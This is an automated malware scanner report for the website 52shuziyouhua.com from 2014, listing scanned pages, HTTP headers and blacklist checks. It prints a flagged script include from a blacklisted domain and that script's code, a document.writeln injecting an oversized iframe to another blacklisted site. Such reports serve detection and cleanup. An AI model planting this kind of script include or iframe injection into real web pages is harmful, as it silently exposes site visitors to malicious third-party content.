New scan:

Malware Scanner report for 52shuziyouhua.com

Malicious/Suspicious/Total urls checked
1/1/9
2 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://52shuziyouhua.com/
HTTP/1.1 200 OK
Date: Sat, 05 Jul 2014 07:10:19 GMT
Accept-Ranges: bytes
ETag: "1ac3b6592f3fcf1:d465"
Server: Microsoft-IIS/6.0
Content-Length: 23560
Content-Location: http://52shuziyouhua.com/index.html
Content-Type: text/html
Last-Modified: Fri, 14 Mar 2014 02:44:41 GMT
X-Powered-By: ASP.NET
clean
http://52shuziyouhua.com/index.html
200 OK
Content-Length: 23560
Content-Type: text/html
suspicious
Page code contains blacklisted domain: www.181178.com

...[873 bytes skipped]...
cms.css" rel="stylesheet" media="screen" type="text/css" />
<script language="javascript" type="text/javascript" src="/include/dedeajax2.js"></script>
<script language="javascript" type="text/javascript" src="/images/js/j.js" ></script>
<script language="javascript" type="text/javascript" src="/templets/default/js/pic_scroll.js"></script>
<SCRIPT language=JavaScript src="http://www.181178.com/qq.js"></SCRIPT>
<script language="javascript" type="text/javascript">
<!--
$(function(){
$("a[_for]").mouseover(function(){
$(this).parents().children("a[_for]").removeClass("thisclass").parents().children("dd").hide();
$(this).addClass("thisclass").blur();
$("#"+$(this).attr("_for")).show();
});
$("a[_for=uc_member]").mouseover();
$("a[_for=flink_1]").mouseover();
});

functio
...[29188 bytes skipped]...

http://52shuziyouhua.com/include/dedeajax2.js
200 OK
Content-Length: 7961
Content-Type: application/x-javascript
clean
http://52shuziyouhua.com/images/js/j.js
200 OK
Content-Length: 31018
Content-Type: application/x-javascript
clean
http://52shuziyouhua.com/templets/default/js/pic_scroll.js
200 OK
Content-Length: 3854
Content-Type: application/x-javascript
clean
http://www.181178.com/qq.js
200 OK
Content-Length: 166
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: www.5780.com

document.writeln("<IFRAME border=0 name=I1 align=center marginWidth=0 src=\" http://www.5780.com/\" frameBorder=0 width=\"1360\" scrolling=no height=8158></IFRAME>");

Decoded script:


<IFRAME border=0 name=I1 align=center marginWidth=0 src=" http://www.5780.com/" frameBorder=0 width="1360" scrolling=no height=8158></IFRAME>

http://52shuziyouhua.com/data/vote/vote_1.js
200 OK
Content-Length: 1381
Content-Type: application/x-javascript
clean
http://count16.51yes.com/click.aspx?id=160190615&logo=7
200 OK
Content-Length: 1777
Content-Type: text/html
clean
http://count16.51yes.com/test404page.js
404 Not Found
Content-Length: 1308
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: 52shuziyouhua.com

Result:
HTTP/1.1 200 OK
Date: Sat, 05 Jul 2014 07:10:19 GMT
Accept-Ranges: bytes
ETag: "1ac3b6592f3fcf1:d465"
Server: Microsoft-IIS/6.0
Content-Length: 23560
Content-Location: http://52shuziyouhua.com/index.html
Content-Type: text/html
Last-Modified: Fri, 14 Mar 2014 02:44:41 GMT
X-Powered-By: ASP.NET

...23560 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 52shuziyouhua.com
Referer: http://www.google.com/search?q=52shuziyouhua.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=52shuziyouhua.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://52shuziyouhua.com/

Result: 52shuziyouhua.com is not infected or malware details are not published yet.